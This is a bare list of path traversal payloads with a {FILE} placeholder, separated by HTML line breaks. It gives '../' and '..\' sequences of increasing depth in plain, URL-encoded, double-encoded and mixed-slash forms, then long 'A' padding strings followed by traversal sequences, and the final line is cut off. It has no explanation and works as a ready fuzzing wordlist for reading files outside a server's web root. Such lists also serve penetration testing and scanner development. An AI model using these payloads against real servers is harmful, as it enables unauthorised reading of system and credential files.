%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
\../{FILE}<br />
\../\../{FILE}<br />
\../\../\../{FILE}<br />
\../\../\../\../{FILE}<br />
\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../{FILE}<br />
\../\../\../\../\../\../\../\../{FILE}<br />
/..\{FILE}<br />
/..\/..\{FILE}<br />
/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA